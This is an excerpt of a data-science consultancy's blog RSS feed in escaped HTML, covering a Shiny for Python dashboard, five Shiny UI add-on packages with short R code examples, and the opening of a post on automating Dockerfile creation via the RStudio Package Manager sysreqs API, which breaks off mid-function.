&lt;p&gt;The &lt;code&gt;App&lt;/code&gt; class allows us to define an object that contains both the UI content and the server function together.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# app.py&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;shiny&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; App
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; App(app_ui, server)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We can then run our app, the command line interface will look for an object called &amp;ldquo;app&amp;rdquo; to act as
the entrypoint by default, however this can be specified to be something else, see &lt;code&gt;shiny run --help&lt;/code&gt;&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;shiny run --reload app
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;The &lt;code&gt;run&lt;/code&gt; command will preview our app, and &lt;code&gt;--reload&lt;/code&gt; will reload the app whenever we make changes to our code.&lt;/p&gt;
&lt;p&gt;&lt;img alt="Screenshot of the shiny dashboard showing a plot of average interactions per year, the most recent Tweet by Jumping Rivers and a user input box." height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/shiny-python-rtweet-dashboard/dashboard_screenshot.png" width="1894"&gt;&lt;/p&gt;
&lt;h1 id="reflections"&gt;Reflections&lt;/h1&gt;
&lt;p&gt;The arrival of Shiny to Python will open up the framework to a whole new cohort of users, myself included! Whilst I have found grasping the basic concepts to be relatively straightforward, I have found learning resources to be pretty much limited to the &lt;a href="https://shiny.rstudio.com/py/api/" rel="external"&gt;API&lt;/a&gt;. Advancing past the core concepts may be more challenging, particularly (I imagine) for users with no experience in &lt;a href="https://shiny.rstudio.com/" rel="external"&gt;Shiny for R&lt;/a&gt;, due to the lack of online reading material. We can also expect changes to be made in the coming months, with &lt;a href="https://shiny.rstudio.com/py/" rel="external"&gt;Shiny for Python&lt;/a&gt; currently being in Alpha. However, with Shiny being such a popular framework amongst R users, the expansion of it to Python is very exciting, and I look forward to seeing how it develops in the future.&lt;/p&gt;
&lt;p&gt;View the dashboard I created:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/jumpingrivers/blog-shiny-python-rtweet-dashboard" rel="external"&gt;Repository&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://jumpingrivers.github.io/blog-shiny-python-rtweet-dashboard/" rel="external"&gt;Deployed application&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;a href="https://github.com/jumpingrivers/blog-shiny-python-rtweet-dashboard/blob/main/app/jr_shiny.csv" rel="external"&gt;Download the data I used&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-python-rtweet-dashboard/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Top 5 Shiny UI Add-On Packages</title><link>https://www.jumpingrivers.com/blog/r-shiny-extensions-ui/</link><pubDate>Thu, 27 Oct 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-shiny-extensions-ui/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-shiny-extensions-ui/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-shiny-extensions-ui/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;There are a growing number of Shiny users across the world, and with
many users comes an increasing number of open-source “add-on” packages
that extend the functionality of Shiny, both in terms of the front end
and the back end of an app.&lt;/p&gt;
&lt;p&gt;This blog will highlight 5 UI add-on packages that can massively improve
your user experience and also just add a bit of flair to your app. Each
package will have an associated example app (some more inspired than
others) that I’ve created where you can actually see the UI component in
action. All code for example apps can be found &lt;a href="https://github.com/jumpingrivers/blog/tree/main/blogs/" rel="external"&gt;on our
GitHub&lt;/a&gt;.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-r-shiny-extensions-ui"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="shinycssloaders"&gt;&lt;a href="https://github.com/daattali/shinycssloaders" rel="external"&gt;{shinycssloaders}&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;If you have graphs or other outputs in your app that are slow to render
and re-render, it can be frustrating for the user if it looks like
nothing is changing after they’ve changed an input or pressed a button
to re-render. Adding a spinner to indicate the plot is re-rendering
makes it clear to the user what is going on and can make that waiting
time a bit more bearable!&lt;/p&gt;
&lt;p&gt;While the {shinycssloaders} package does not speed up your plot
rendering (although if you &lt;em&gt;do&lt;/em&gt; need help with speeding up a Shiny app,
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/" rel="external"&gt;we can
help&lt;/a&gt;),
it does let you very easily add loading spinners to any specific output
in your Shiny app.&lt;/p&gt;
&lt;p&gt;All you need to do is wrap your Shiny output in the &lt;code&gt;withSpinner()&lt;/code&gt;
function! You can also modify the spinner with the &lt;code&gt;type&lt;/code&gt;, &lt;code&gt;color&lt;/code&gt;, and
&lt;code&gt;size&lt;/code&gt; arguments.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# in the UI&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;withSpinner&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;plotOutput&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;my_plot&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In my example app:&lt;/p&gt;
&lt;p&gt;&lt;img alt="A gif of a plot being re-generated with a shinycssloader showing\nduring rendering." height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/r-shiny-extensions-ui/gifs/shinycssloaders.gif" width="882"&gt;&lt;/p&gt;
&lt;h2 id="waiter"&gt;&lt;a href="https://github.com/JohnCoene/waiter" rel="external"&gt;{waiter}&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;{shinycssloaders} is very useful if you have one or more slow outputs
that need to be rendered or re-rendered, but what if just loading up
your app at start up is slow? For example, if you’re pulling new data
from an API or a database every time you load the app. This is where the
{waiter} package comes in handy!&lt;/p&gt;
&lt;p&gt;{waiter} allows you to create a loading screen that covers the entire
app until some specific bit of code has finished running. You just need
to tell it when to show (&lt;code&gt;waiter_show()&lt;/code&gt;) and when to hide
(&lt;code&gt;waiter_hide()&lt;/code&gt;) the waiter loading screen. Note that you’ll need to
activate the waiter functionality by including the &lt;code&gt;useWaiter()&lt;/code&gt; command
in your UI.&lt;/p&gt;
&lt;p&gt;The basic syntax is:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# in the UI&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;useWaiter&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# in the server&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;waiter_show&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# code that takes a while to run&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;waiter_hide&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In my example app:&lt;/p&gt;
&lt;p&gt;&lt;img alt="A gif of a an app being refreshed with a loading screen created by the\nwaiter package." height="auto" id="h-rh-i-1" src="https://www.jumpingrivers.com/blog/r-shiny-extensions-ui/gifs/waiter.gif" width="831"&gt;&lt;/p&gt;
&lt;h2 id="rclipboard--tippy"&gt;&lt;a href="https://github.com/sbihorel/rclipboard" rel="external"&gt;{rclipboard}&lt;/a&gt; &amp;amp; &lt;a href="https://github.com/JohnCoene/tippy" rel="external"&gt;{tippy}&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;If your app needs to generate any kind of text that would then need to
be used elsewhere, e.g. a URL or a uniquely identifying string, then a
“Copy to clipboard” button can easily be added with the {rclipboard}
package. The main function from {rclipboard} is &lt;code&gt;rclipButton()&lt;/code&gt; which
creates a clickable button that lets you copy whatever is passed to the
&lt;code&gt;clipText&lt;/code&gt; argument. There are no associated &lt;code&gt;render*()&lt;/code&gt; or &lt;code&gt;*Output()&lt;/code&gt;
functions, so you can create your clipboard button and then render it
with &lt;code&gt;renderUI()&lt;/code&gt; and display it with &lt;code&gt;uiOutput()&lt;/code&gt;. You will also need
to activate the copy to clipboard functionality by including the
&lt;code&gt;rclipboardSetup()&lt;/code&gt; command in your UI.&lt;/p&gt;
&lt;p&gt;A basic button could be created like this:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# in the UI&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;rclipboardSetup&lt;/span&gt;(),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;uiOutput&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;clip_button&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# in the server&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;renderUI&lt;/span&gt;({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rclipButton&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;clip_button&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Copy to clipboard&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; clipText &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Text to be copied&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; icon &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;icon&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;clipboard&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;However, when you press this button there is no feedback to the user
that anything has actually been copied. This is where the {tippy}
package comes in. {tippy} allows you to add tooltips to UI elements in
your app that appear at a certain trigger such as hover or click.
Tooltips are an effective way to provide help or feedback to the user
and improve their experience using the app.&lt;/p&gt;
&lt;p&gt;All you need to do is call the &lt;code&gt;tippy_this()&lt;/code&gt; function on the input ID
of your UI component. If we have a clipboard button with ID
&lt;code&gt;clip_button&lt;/code&gt; as above, we could add a tooltip that says “String
copied!” whenever the button is clicked.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# in the UI&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;tippy_this&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;clip_button&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tooltip &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;String copied!&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; trigger &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;click&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In my example app:&lt;/p&gt;
&lt;p&gt;&lt;img alt="A gif of a random string being copied to clipboard with tooltip pop-up\nand then being pasted." height="auto" id="h-rh-i-2" src="https://www.jumpingrivers.com/blog/r-shiny-extensions-ui/gifs/rclipboard_tippy.gif" width="882"&gt;&lt;/p&gt;
&lt;h2 id="shinyglide"&gt;&lt;a href="https://github.com/juba/shinyglide" rel="external"&gt;{shinyglide}&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;{shinyglide} lets you create a carousel-like window that allows the user
to move between different screens in a chronological order using “Next”
and “Back” buttons. It’s a nice way to add a pop-up to guide your user
through some action, either for collecting inputs for your app, or
demoing how to use the app, or just as an embedded presentation.&lt;/p&gt;
&lt;p&gt;There is a lot of flexibility when using {shinyglide}, but a basic
series of screens could be constructed like this:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# in the UI&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;glide&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;screen&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# content on the first screen&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;screen&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# content on second screen&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;A nice feature is that you can easily add a condition that needs to be
met until the user can move on to the next page, e.g., the user needs to
provide some input. This is done with the &lt;code&gt;next_condition&lt;/code&gt; argument in
the &lt;code&gt;screen()&lt;/code&gt; function.&lt;/p&gt;
&lt;p&gt;In my example app:&lt;/p&gt;
&lt;p&gt;&lt;img alt="A gif of three shinyglide screens being moved between using Next and\nBack buttons." height="auto" id="h-rh-i-3" src="https://www.jumpingrivers.com/blog/r-shiny-extensions-ui/gifs/shinyglide.gif" width="1116"&gt;&lt;/p&gt;
&lt;h2 id="sortable"&gt;&lt;a href="https://github.com/rstudio/sortable" rel="external"&gt;{sortable}&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Last but not least is {sortable}, which is a package that enables
drag-and-drop behaviour in your Shiny apps. This means that the user can
perform actions such as rearranging plots in a grid, or include/exclude
elements by dragging them in and out of a specific panel.&lt;/p&gt;
&lt;p&gt;The basic syntax of {sortable} is:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;sortable_js&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;element_id&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;where &lt;code&gt;&amp;quot;element_id&amp;quot;&lt;/code&gt; is the ID of the div containing the elements you
wish to be drag-and-drop-able.&lt;/p&gt;
&lt;p&gt;In my example app:&lt;/p&gt;
&lt;p&gt;&lt;img alt="A gif of four plots in a grid where two are swapped by using drag and\ndrop with the cursor." height="auto" id="h-rh-i-4" src="https://www.jumpingrivers.com/blog/r-shiny-extensions-ui/gifs/sortable.gif" width="878"&gt;&lt;/p&gt;
&lt;h2 id="further-resources"&gt;Further resources&lt;/h2&gt;
&lt;p&gt;If you want to explore even more packages that extend the Shiny
framework, I would highly recommend checking out this curated list of
Shiny extension packages:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/nanxstats/awesome-shiny-extensions" rel="external"&gt;Awesome Shiny
Extensions&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-shiny-extensions-ui/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Automating Dockerfile creation for Shiny apps</title><link>https://www.jumpingrivers.com/blog/shiny-auto-docker/</link><pubDate>Thu, 20 Oct 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-auto-docker/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-auto-docker/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-auto-docker/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h2 id="introduction"&gt;Introduction&lt;/h2&gt;
&lt;p&gt;For creating a production deployment of a {shiny} application it is
often useful to be able to provide a Docker image that contains all the
dependencies for that application. Here we explore how one might go
about automating the creation of a Dockerfile that will allow us to
build such an image for a {shiny} application.&lt;/p&gt;
&lt;h2 id="what-is-docker"&gt;What is docker?&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://www.docker.com/" rel="external"&gt;Docker&lt;/a&gt; is an open source platform that
enables developers to build, deploy and run containers, standardised
executable components that combine application source code with the
operating system libraries and dependencies required to run that code.&lt;/p&gt;
&lt;p&gt;A general introduction to Docker for R users can be found in
&lt;a href="https://colinfay.me/docker-r-reproducibility/" rel="external"&gt;this&lt;/a&gt; blog post by Colin
Fay, and the docker &lt;a href="https://www.docker.com/" rel="external"&gt;website&lt;/a&gt; also has some
excellent documentation.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-shiny-auto-docker"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="obtaining-system-dependencies"&gt;Obtaining system dependencies&lt;/h2&gt;
&lt;p&gt;When installing R packages, occasionally you will need additional system
dependencies. When building a Docker image we will want to include the
installation of those system dependencies into the Dockerfile. If we are
to automate the process of writing a Dockerfile for building an image to
run a {shiny} application then we need to find some programmatic
solution to determining the required system dependencies.&lt;/p&gt;
&lt;p&gt;It turns out that the RStudio Package Manager (RSPM) product has an API
that can be queried to obtain the system requirements of a collection of
R packages. The lovely folk at Posit also provide an instance of RSPM
that anyone can make use of so it is trivial to obtain this information
even if you do not have RSPM yourself. For example if we wanted to
inspect the system dependencies of a package like {shiny} for Ubuntu
22.04 then a
&lt;a href="https://packagemanager.rstudio.com/__api__/repos/1/sysreqs?all=false&amp;pkgname=shiny&amp;distribution=ubuntu&amp;release=22.04" rel="external"&gt;request&lt;/a&gt;
to&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;https://packagemanager.rstudio.com/__api__/repos/1/sysreqs?all&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;false&amp;amp;&lt;span style="color:#79c0ff"&gt;pkgname&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;shiny&amp;amp;&lt;span style="color:#79c0ff"&gt;distribution&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;ubuntu&amp;amp;&lt;span style="color:#79c0ff"&gt;release&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;22.04
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;would do the trick.&lt;/p&gt;
&lt;p&gt;In fact the {vetiver} package has a non-exported function,
&lt;code&gt;glue_sys_reqs()&lt;/code&gt; that will build a string for the command to install
these system requirements.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;glue_sys_reqs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(pkgs) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; rlang&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;check_installed&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;curl&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; rspm &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;Sys.getenv&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;RSPM_ROOT&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;https://packagemanager.rstudio.com&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; rspm_repo_id &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;Sys.getenv&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;RSPM_REPO_ID&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; rspm_repo_url &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; glue&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;glue&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;{rspm}/__api__/repos/{rspm_repo_id}&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pkgnames &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; glue&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;glue_collapse&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;unique&lt;/span&gt;(pkgs), sep &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;amp;pkgname=&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; req_url &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; glue&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;glue&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;{rspm_repo_url}/sysreqs?all=false&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;amp;pkgname={pkgnames}&amp;amp;distribution=ubuntu&amp;amp;release=22.04&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; res &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; curl&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;curl_fetch_memory&lt;/span&gt;(req_url)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sys_reqs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; jsonlite&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;fromJSON&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;rawToChar&lt;/span&gt;(res&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;content), simplifyVector &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;)
